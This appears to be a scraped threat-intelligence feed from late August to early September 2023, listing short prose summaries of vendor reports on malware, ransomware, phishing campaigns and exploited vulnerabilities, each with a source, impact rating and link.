Recent weeks have seen an increase in social engineering attacks against IT service desk staff, according to several U.S.-based Okta customers. The caller's tactic was to persuade the service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.
Source: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
2023-09-04
Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
LOW
+
Intel Source:
ASEC
Intel Name:
Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
Date of Scan:
2023-09-04
Impact:
LOW
Summary:
A phishing campaign that spreads via spam emails and runs a PE file (EXE) without writing the file to the user's computer has been uncovered by ASEC researchers. The malware strains AgentTesla, Remcos, and LimeRAT are ultimately executed by the malware attachment with the .hta extension.
Source: https://asec.ahnlab.com/en/56512/
2023-09-04
FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
Date of Scan:
2023-09-04
Impact:
MEDIUM
Summary:
Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
Source: https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/
2023-09-04
ZeroDay_Vulnerabilities_Detected_on_WinRAR
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
ZeroDay_Vulnerabilities_Detected_on_WinRAR
Date of Scan:
2023-09-04
Impact:
MEDIUM
Summary:
In the widely used WinRAR software, the zero-day vulnerabilities CVE-2023-38831 and CVE-2023-40477 have been discovered. The possibility of remote code execution presented by these vulnerabilities raises serious security concerns. With half a billion users globally, it is a well-liked compression tool that is essential to numerous digital processes.
Source: https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/
2023-09-02
A_new_campaign_of_novel_RAT
LOW
+
Intel Source:
Interlab
Intel Name:
A_new_campaign_of_novel_RAT
Date of Scan:
2023-09-02
Impact:
LOW
Summary:
On 8/28/2023, Interlab obtained a sample that was sent to a journalist with highly targeted content luring the recipient to open the document. After examining it, Interlab discovered that, after initial compromise, an AutoIT script was executed to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which was named "SuperBear" due to naming conventions in the code.
Source: https://interlab.or.kr/archives/19416
2023-09-02
Analyses_on_new_open_source_infostealer
LOW
+
Intel Source:
Talos
Intel Name:
Analyses_on_new_open_source_infostealer
Date of Scan:
2023-09-02
Impact:
LOW
Summary:
This is this week's edition of the Threat Source newsletter. Talos is seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer "SapphireStealer", which was analyzed by Talos researchers and shared in their blog.
Source: https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/
2023-09-02
New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
LOW
+
Intel Source:
Rapid7
Intel Name:
New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
Date of Scan:
2023-09-02
Impact:
LOW
Summary:
Recently, Rapid7 discovered a fake browser update tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined that a new loader is utilized to execute infostealers, including StealC and Lumma, on compromised systems.
Source: https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/
2023-09-01
Taking_down_the_main_admin_of_phishing_as_a_service_16shop
LOW
+
Intel Source:
TrendMicro
Intel Name:
Taking_down_the_main_admin_of_phishing_as_a_service_16shop
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
Trend Micro analyzed and investigated the phishing-as-a-service 16shop over the years. The post also covers the partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing operation.
Source: https://www.trendmicro.com/en_us/research/23/i/revisiting-16shop-phishing-kit-trend-interpol-partnership.html
2023-09-01
Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
LOW
+
Intel Source:
Checkpoint
Intel Name:
Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
The design and implementation of Hidden Bee coin miner and Rhadamanthys stealer considerably overlap. Custom executable formats, the usage of comparable virtual filesystems, the use of LUA scripts, identical routes to some of the components, reused functions, similar use of steganography, and overall related architecture are just a few examples of the similarities that are readily obvious.
Source: https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/
2023-09-01
The_attacks_on_USPS_and_US_Citizens_for_data_theft
LOW
+
Intel Source:
Resecurity
Intel Name:
The_attacks_on_USPS_and_US_Citizens_for_data_theft
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
Resecurity has discovered a large-scale smishing campaign targeting US citizens. Similar scams have been noticed before targeting FedEx and UPS. The bad actors, attributed to Chinese-speaking cybercriminals, are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group behind the campaign has been named "Smishing Triad" as it leverages smishing as its main attack vector and originates from China.
Source: https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft
2023-09-01
Decrypting_Key_Group_Ransomware
LOW
+
Intel Source:
Eclecticiq
Intel Name:
Decrypting_Key_Group_Ransomware
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
EclecticIQ analysts discovered that Key Group ransomware can be classified as a low-sophistication threat actor. The ransomware samples contained multiple cryptographic mistakes that enabled EclecticIQ to create a decryption tool for this specific ransomware version, built on August 3, 2023. Key Group, or KEYGROUP777, is a Russian-speaking cybercrime actor focused on financial gain by selling Personal Identifying Information (PII) or initial access to compromised devices and by obtaining ransom payments.
Source: https://blog.eclecticiq.com/decrypting-key-group-ransomware-emerging-financially-motivated-cyber-crime-gang
2023-09-01
Exploitation_of_CVE_2023_38831
LOW
+
Intel Source:
CERT-UA
Intel Name:
Exploitation_of_CVE_2023_38831
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
The Ukrainian government computer emergency response team, CERT-UA, has noted a cyberattack by the UAC-0057 group. It was discovered that the "Zbirnyk_tez_Y_23.rar" file contained an exploit for the CVE-2023-38831 vulnerability. If this exploit is successful, it causes the BAT file "16872_16_2023_03049.pdf.cmd" to be launched, which in turn launches the LNK file "16872_16_2023_03049.lnk", which then uses the mshta.
Source: https://cert.gov.ua/article/5661411
2023-09-01
An_Open_Source_Info_Stealer_Named_SapphireStealer
LOW
+
Intel Source:
Talos
Intel Name:
An_Open_Source_Info_Stealer_Named_SapphireStealer
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it's been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.
Source: https://blog.talosintelligence.com/sapphirestealer-goes-open-source/
2023-09-01
Malicious_PDFs
LOW
+
Intel Source:
Trustwave
Intel Name:
Malicious_PDFs
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
In the last couple of months, Trustwave SpiderLabs analysts have noticed a spike in threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/threat-loaded-malicious-pdfs-never-go-out-of-style/
2023-09-01
A_detailed_analyses_of_Brute_Ratel_C4_payloads
LOW
+
Intel Source:
Cybergeeks
Intel Name:
A_detailed_analyses_of_Brute_Ratel_C4_payloads
Date of Scan:
2023-09-01
Impact:
LOW
Summary:
Cyber Geeks published a deep analysis of Brute Ratel C4 payloads. Brute Ratel C4 is red team and adversary simulation software that can be considered an alternative to Cobalt Strike.
Source: https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
2023-08-31
The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
Date of Scan:
2023-08-31
Impact:
MEDIUM
Summary:
Rapid7's managed detection and response team has discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or not enforced for all users (i.e., via MFA bypass groups).
Source: https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/
2023-08-31
The_attacks_on_Adobe_ColdFusion
LOW
+
Intel Source:
Fortinet
Intel Name:
The_attacks_on_Adobe_ColdFusion
Date of Scan:
2023-08-31
Impact:
LOW
Summary:
Last month, Adobe took countermeasures against the exploitation of pre-authentication remote code execution (RCE) vulnerabilities in its ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous attempts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a serious risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet analysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.
Source: https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities
2023-08-31
A_new_wave_of_Good_Day_ransomware_attacks
LOW
+
Intel Source:
SentinelOne
Intel Name:
A_new_wave_of_Good_Day_ransomware_attacks
Date of Scan:
2023-08-31
Impact:
LOW
Summary:
SentinelOne researchers shared in their blog several unique Good Day ransom notes and victim portals, along with their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware is a variant within the ARCrypter family. This new wave of Good Day attacks features individual TOR-based victim portals for each target.
Source: https://www.sentinelone.com/blog/threat-actor-interplay-good-days-victim-portals-and-their-ties-to-cloak/
2023-08-31
DGA_analysis_and_the_Gazavat_DMSniff_link
LOW
+
Intel Source:
Walmart Global Tech Blog
Intel Name:
DGA_analysis_and_the_Gazavat_DMSniff_link
Date of Scan:
2023-08-31
Impact:
LOW
Summary:
Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known, at least in part, as Expiro. Over the years AV companies have grouped it alongside a few other malware versions under the name Expiro, a file infector. This is a result of various malware families reusing code from the Carberp source leak.
Source: https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d
2023-08-31
Examining_Andariel_Recent_Attacking_Activities
LOW
+
Intel Source:
ASEC
Intel Name:
Examining_Andariel_Recent_Attacking_Activities
Date of Scan:
2023-08-31
Impact:
LOW
Summary:
ASEC researchers have found attacks thought to have been carried out by the Andariel group. The Andariel threat group, which typically targets Korean businesses and organizations, is known to be associated with the Lazarus threat group or one of its affiliates. Attacks on targets in Korea have been noted since 2008.
Source: https://asec.ahnlab.com/en/56405/
2023-08-30
The_actions_against_the_Qakbot_botnet
MEDIUM
+
Intel Source:
Secureworks
Intel Name:
The_actions_against_the_Qakbot_botnet
Date of Scan:
2023-08-30
Impact:
MEDIUM
Summary:
On August 29, 2023, U.S. law enforcement started a national operation to disrupt the Qakbot botnet (also known as Qbot) and its associated infrastructure. Secureworks Counter Threat Unit researchers have long monitored this botnet and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.
Source: https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware
2023-08-30
The_exploition_of_Kinsing_Malware
LOW
+
Intel Source:
Aquasec
Intel Name:
The_exploition_of_Kinsing_Malware
Date of Scan:
2023-08-30
Impact:
LOW
Summary:
Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.
Source: https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability
2023-08-30
The_Rise_of_QR_Codes_in_Phishing
LOW
+
Intel Source:
Trustwave
Intel Name:
The_Rise_of_QR_Codes_in_Phishing
Date of Scan:
2023-08-30
Impact:
LOW
Summary:
Threat actors are taking image phishing to the next level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Trustwave analysts observed using the technique are primarily disguised as Multifactor Authentication (MFA) notifications, which trick victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the intended location, the QR code leads them to the threat actor’s phishing page.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/think-before-you-scan-the-rise-of-qr-codes-in-phishing/
2023-08-30
Earth_Estries_Targeting_Government_and_Technology_Sector
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Earth_Estries_Targeting_Government_and_Technology_Sector
Date of Scan:
2023-08-30
Impact:
MEDIUM
Summary:
Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. Earth Estries targets governments and enterprises in the technology sector, and after analyzing the deployed tactics, techniques, and procedures (TTPs) the researchers found parallels with the advanced persistent threat (APT) group FamousSparrow.
Source: https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html
2023-08-30
RemcosRat_Malware_Peeled_Back
LOW
+
Intel Source:
McAfee
Intel Name:
RemcosRat_Malware_Peeled_Back
Date of Scan:
2023-08-30
Impact:
LOW
Summary:
Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in a phishing email, and a highly obfuscated VBS file was inside the archive.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/
2023-08-29
DarkGate_Malware_Activity_Spikes
LOW
+
Intel Source:
Telekom Security
Intel Name:
DarkGate_Malware_Activity_Spikes
Date of Scan:
2023-08-29
Impact:
LOW
Summary:
Telekom security researchers have identified that a new malspam campaign was observed deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates.
Source: https://github.security.telekom.com/2023/08/darkgate-loader.html
2023-08-29
Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
LOW
+
Intel Source:
Sophos
Intel Name:
Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
Date of Scan:
2023-08-29
Impact:
LOW
Summary:
Sophos X-Ops is currently monitoring a campaign by threat actors targeting unpatched, internet-facing Citrix and NetScaler systems. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used many of the same TTPs. IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv
Source: https://infosec.exchange/@SophosXOps/110951651051968204
2023-08-29
Embedding_a_malicious_Word_file_into_a_PDF_file
LOW
+
Intel Source:
JPCERT
Intel Name:
Embedding_a_malicious_Word_file_into_a_PDF_file
Date of Scan:
2023-08-29
Impact:
LOW
Summary:
JPCERT/CC has discovered a new technique that was used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They described the technique, “MalDoc in PDF”, in their blog and explained the details of and countermeasures against it.
Source: https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
2023-08-29
Target_on_Citrix_NetScaler_systems_in_massive_attacks
MEDIUM
+
Intel Source:
Security Affairs
Intel Name:
Target_on_Citrix_NetScaler_systems_in_massive_attacks
Date of Scan:
2023-08-29
Impact:
MEDIUM
Summary:
Sophos X-Ops has tracked an ongoing campaign, which is targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution, tracked as CVE-2023-3519, in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection that could result in unauthenticated remote code execution.
Source: https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1
2023-08-29
NPM_Package_Masquerading
LOW
+
Intel Source:
Phylum
Intel Name:
NPM_Package_Masquerading
Date of Scan:
2023-08-29
Impact:
LOW
Summary:
On August 24th 2023, Phylum's detection system observed a suspicious package published to npm called “emails-helper." After investigating it, it was determined that this package was part of a sophisticated attack involving Base64-encoded and encrypted binaries. The scheme delivers encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.
Source: https://blog.phylum.io/npm-emails-validator-package-malware/
2023-08-28
Widespread_Ransomware_is_Caused_by_HTML_Smuggling
LOW
+
Intel Source:
DFIR Report
Intel Name:
Widespread_Ransomware_is_Caused_by_HTML_Smuggling
Date of Scan:
2023-08-28
Impact:
LOW
Summary:
Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.
Source: https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
2023-08-28
An_increase_in_MacOS_malware_detections
LOW
+
Intel Source:
Ironnet
Intel Name:
An_increase_in_MacOS_malware_detections
Date of Scan:
2023-08-28
Impact:
LOW
Summary:
IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts' investigation into these incidents found that these infections originated from already-infected personal devices that were brought into education networks, with the majority occurring at higher education institutions.
Source: https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean
2023-08-28
In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
LOW
+
Intel Source:
Netenrich
Intel Name:
In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
Date of Scan:
2023-08-28
Impact:
LOW
Summary:
Researchers at Netenrich examined the Adhubllka ransomware, which has been targeting individuals and small businesses since at least January 2020 with ransoms ranging from $800 to $1,600.
Source: https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family
2023-08-28
Case_Studies_of_MS_SQL_Server_Proxyjacking
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Case_Studies_of_MS_SQL_Server_Proxyjacking
Date of Scan:
2023-08-28
Impact:
MEDIUM
Summary:
Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack vectors against Windows systems is publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute-force or dictionary attacks. If successful, they infect the system with malware.
Source: https://asec.ahnlab.com/en/56350/
2023-08-28
Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
Date of Scan:
2023-08-28
Impact:
MEDIUM
Summary:
CERT-UA researchers have observed the distribution of emails with BZIP, GZIP, and RAR archive attachments containing BAT files built with the ScrubCrypt cryptor (priced from USD 249); launching them results in the computer being infected with the AsyncRAT malicious program.
Source: https://cert.gov.ua/article/5628441
2023-08-28
DreamBus_Botnet_comes_back
LOW
+
Intel Source:
Juniper
Intel Name:
DreamBus_Botnet_comes_back
Date of Scan:
2023-08-28
Impact:
LOW
Summary:
Juniper Threat Labs researchers have observed multiple attacks in which threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for attackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details of the attacks and the bot in their blog.
Source: https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability
2023-08-28
IoT_Targeting_Malware_Expands_Threat_Landscape
LOW
+
Intel Source:
Akamai
Intel Name:
IoT_Targeting_Malware_Expands_Threat_Landscape
Date of Scan:
2023-08-28
Impact:
LOW
Summary:
The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot's scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.
Source: https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
2023-08-26
Recent_activity_of_Scattered_Spider_threat_group
MEDIUM
+
Intel Source:
Trellix
Intel Name:
Recent_activity_of_Scattered_Spider_threat_group
Date of Scan:
2023-08-26
Impact:
MEDIUM
Summary:
Trellix researchers describe in their blog the details of the modus operandi of Scattered Spider: their recent events, the tools they leverage, the vulnerabilities they exploit, and their impact. The blog also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/scattered-spider-the-modus-operandi.html
2023-08-25
The_Constant_Threat_Posed_by_Remcos_RAT
LOW
+
Intel Source:
Cyfirma
Intel Name:
The_Constant_Threat_Posed_by_Remcos_RAT
Date of Scan:
2023-08-25
Impact:
LOW
Summary:
Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.
Source: https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/
2023-08-25
A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
LOW
+
Intel Source:
Microsoft
Intel Name:
A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
Date of Scan:
2023-08-25
Impact:
LOW
Summary:
Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations anywhere else. Microsoft attributes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior suggests the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.
Source: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
2023-08-25
The_Investigation_of_RedLine_Stealer_Spam_Campaign
LOW
+
Intel Source:
Eclecticiq
Intel Name:
The_Investigation_of_RedLine_Stealer_Spam_Campaign
Date of Scan:
2023-08-25
Impact:
LOW
Summary:
EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign succeeded by distributing command and control across recently created domains hosted on IP addresses with reliable traffic, while the RedLine developers provide only minor iterations on previous variants.
Source: https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat
2023-08-25
Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
HIGH
+
Intel Source:
Talos
Intel Name:
Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
Date of Scan:
2023-08-25
Impact:
HIGH
Summary:
Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.
Source: https://blog.talosintelligence.com/lazarus-quiterat/
2023-08-25
Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
LOW
+
Intel Source:
Secureworks
Intel Name:
Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
Date of Scan:
2023-08-25
Impact:
LOW
Summary:
Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google's geolocation API.
Source: https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware
2023-08-25
Lazarus_Group_new_threat_CollectionRAT
HIGH
+
Intel Source:
Talos
Intel Name:
Lazarus_Group_new_threat_CollectionRAT
Date of Scan:
2023-08-25
Impact:
HIGH
Summary:
Researchers from Cisco Talos have discovered another new Lazarus Group threat called “CollectionRAT". CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts analyzed it and concluded that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Source: https://blog.talosintelligence.com/lazarus-collectionrat/
2023-08-24
Technical_Analysis_of_XWorm_Malware
LOW
+
Intel Source:
Any.Run
Intel Name:
Technical_Analysis_of_XWorm_Malware
Date of Scan:
2023-08-24
Impact:
LOW
Summary:
AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.
Source: https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/
2023-08-24
Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
Date of Scan:
2023-08-24
Impact:
LOW
Summary:
Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/08/malvertisers-up-the-game-against-researchers
2023-08-24
New_Threat_Coverage_Akira_8Base_and_Rorschach
MEDIUM
+
Intel Source:
Safebreach
Intel Name:
New_Threat_Coverage_Akira_8Base_and_Rorschach
Date of Scan:
2023-08-24
Impact:
MEDIUM
Summary:
SafeBreach's Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.
Source: https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/
2023-08-24
New_Info_Stealer_Family_Named_Agniane
LOW
+
Intel Source:
Zscaler
Intel Name:
New_Info_Stealer_Family_Named_Agniane
Date of Scan:
2023-08-24
Impact:
LOW
Summary:
Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.
Source: https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat
2023-08-24
Raccoon_Stealer_Returns_with_New_Version
LOW
+
Intel Source:
SOC Radar
Intel Name:
Raccoon_Stealer_Returns_with_New_Version
Date of Scan:
2023-08-24
Impact:
LOW
Summary:
SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.
Source: https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/
2023-08-24
Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
LOW
+
Intel Source:
Sentinelone
Intel Name:
Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
Date of Scan:
2023-08-24
Impact:
LOW
Summary:
SentinelOne researchers have observed that ransomware tactics have evolved, with attackers now targeting Linux and VMware ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.
Source: https://www.sentinelone.com/blog/from-conti-to-akira-decoding-the-latest-linux-esxi-ransomware-families/
2023-08-23
Dropping_AgentTesla_Exotic_Excel_Files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Dropping_AgentTesla_Exotic_Excel_Files
Date of Scan:
2023-08-23
Impact:
LOW
Summary:
SANS researchers discovered that attackers prefer to employ more unusual extensions to boost their chances of evading simplistic mail gateway rules. This time, the extension ".xlam" was used. They discovered multiple emails that sent .xlam files to potential victims.
Source: https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/
2023-08-23
AI_Hype_Abused_in_Malicious_Facebook_Ads
LOW
+
Intel Source:
Trendmicro
Intel Name:
AI_Hype_Abused_in_Malicious_Facebook_Ads
Date of Scan:
2023-08-23
Impact:
LOW
Summary:
Trendmicro researchers have identified that cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims' credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.
Source: https://www.trendmicro.com/en_us/research/23/h/profile-stealers-spread-via-llm-themed-facebook-ads.html
2023-08-23
Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
Date of Scan:
2023-08-23
Impact:
LOW
Summary:
ESET researchers examined Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.
